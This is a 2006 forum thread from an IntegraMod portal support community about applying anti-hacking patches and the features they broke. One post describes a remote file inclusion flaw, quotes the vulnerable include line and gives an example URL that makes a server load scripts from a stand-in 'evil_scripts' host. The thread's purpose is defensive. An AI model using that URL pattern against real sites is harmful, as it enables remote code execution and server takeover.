Recent Hacking Discussion (continued...)

Author: **ihammo** » Wed Aug 30, 2006 10:55 am

Hmm.. Not really sure then tbh. I am no expert (especially with htaccess!) and we have already reached the limit of my knowledge <img> - everything I know I have learnt from trial and error building my one and only site!

Hopefully someone with a bit more know-how can help further (sorry!)

Author: **tekguru** » Wed Aug 30, 2006 11:28 am

Since installing this batch of fixes we've found:

- RSS Feeds no longer function
- M2F no longer sends out messages

These are really essentail to us, so anyone any ideas on how to fix them, or which of the Mods may need backing out to get them working again?

HELP!

Author: **tekguru** » Wed Aug 30, 2006 3:45 pm

Fixed it - false alarm guys <img>

Author: **tekguru** » Wed Aug 30, 2006 3:47 pm

Only one question though, how can we effect a style change without the functionality in there?

We use a 'Mobile' theme which a fair number of our users need to use and since adding the fixes in we are of course unable to change the style?

Author: **Solomon** » Wed Aug 30, 2006 4:07 pm

"tekguru";p="14605" wrote:Only one question though, how can we effect a style change without the functionality in there?

We use a 'Mobile' theme which a fair number of our users need to use and since adding the fixes in we are of course unable to change the style?

I've been told its ok to re-enable the Style Select block after you apply the fixes.

Author: **Michaelo** » Wed Aug 30, 2006 5:57 pm

Style Change Block... The best way is to test it...

With or without register globals being off it should be OK, however run a test as you have been and prove it for yourselves... The edits work for me and I have tried all know hacks to get past it...

If your provider has registered globals on get them to turn them off... not only are they not needed they will be removed soon enough... If my provider has them on and would not turn them off I would move providers... <img>

Author: **Vadar** » Wed Aug 30, 2006 6:55 pm

For Mike: With all of the changes applied, I have quite a number of pages within the ACP closed down with the hacking attempt message. I can no longer even click on PhP Info (Tools block) without getting that message.

My question is, is this normal with these fixes applied or have I done something wrong?

Thanks

Author: **Michaelo** » Wed Aug 30, 2006 7:13 pm

Re check the functions.php edits and if still blocked from a page post the first ten line of that page...
Mike

Author: **tekguru** » Thu Aug 31, 2006 9:27 am

Right, silly Q, but how do we turn back on the style changer?

Author: **sasan** » Thu Aug 31, 2006 11:25 am

hi guys in 2 week we cane find 4 bugs in integramod portal this bugs whit high risk this form have 5 bug xss and sql injection i can put here until repair but this bug not very importent ! until new bug found this metod name is remot File Inclusion Vulnerabilities whit this bug you can run any php script frome a diferent server such this link
http://www.exmaple.ir/frame.php?body=ht ... 287.txt%3F ( i change domain name but if want i can get a true link!!) see this lins
include_once ($chemin."conf/code.php")
its one line of mod_phpalbum in Portail PHP its have a bug and file inclusion!!! now hacker can access any shell on this server whit this link

http://www.site.com/[path]/mod_phpalbum/sommaire_admin.php?chemin=http://evil_scripts?
in integramod also 4 files have this problem !!
functions_mod_user.php
functions.php
functions_portal.php
i very search and rad line by line on integra files but i can find any dangres bug on this files !!! they have some bug whit low risk but may any hacker can find new bug!!!!!! i dont say integra dont have bug but i try and dont can any dangerus bug!! now if you want dont hack !! whit same method can use cpanel and set permision on your includs folder ! admin folder ! and any folder you think need protect whit password! whit this if your forum have a bug until hacker dont have your password peotect cant do anything!!

Author: **Fubie** » Thu Aug 31, 2006 12:03 pm

That's excellent information sasan!

Was this done for IM 140 or IM141 beta?

We will be releasing RC4 which will be a post hack fix test release soon. I'm curious to see how well that will stand up especailly after all the long hours Mike put into it.

Author: **computerz** » Thu Aug 31, 2006 2:24 pm

Hey so far so good guys.. i've applied the changes and haven't been hacked...... yet....... i've set 777 permissions on upload folders since yesterday. The hackers usually get me within a week of doing so, so I'll give it another week and if I dont hear from the hackers, I'll say that it worked.

But its good to know that Michaelo tried to hack it himself and couldn't get buy it.

@Michaelo,

you mean you tried to remotely upload files to the 777 directories right, while not logged on as a user right?

I hope you tested for this, because the hackers who hacked my site were not logged on. I assume they copied my source and altered the forms or something, but in any case they were able to get perl scripts and .zip files in my upload folders.

Author: **Michaelo** » Thu Aug 31, 2006 5:43 pm

The two files used in the above hack are not part of 1.4.0 or 1.4.1, so I assume these are part of a mod that some people have added... Unfortunately I can test them... therefore I can fix them... <img>

Author: **Vadar** » Thu Aug 31, 2006 8:44 pm

Mike: Thanks. I went back in with a clean functions.php, verified that the problem went away, then added the fixes again, a bit more carefully this time... <img>

Problem solved.

Author: **Michaelo** » Fri Sep 01, 2006 7:58 am

No worries Vadar... If I had a penny for every time I did that I could buy a new car <img>

Recent Hacking Discussion (continued...)

reply

Re: Recent Hacking Discussion (continued...)

Re: Recent Hacking Discussion (continued...)

reply

Who is online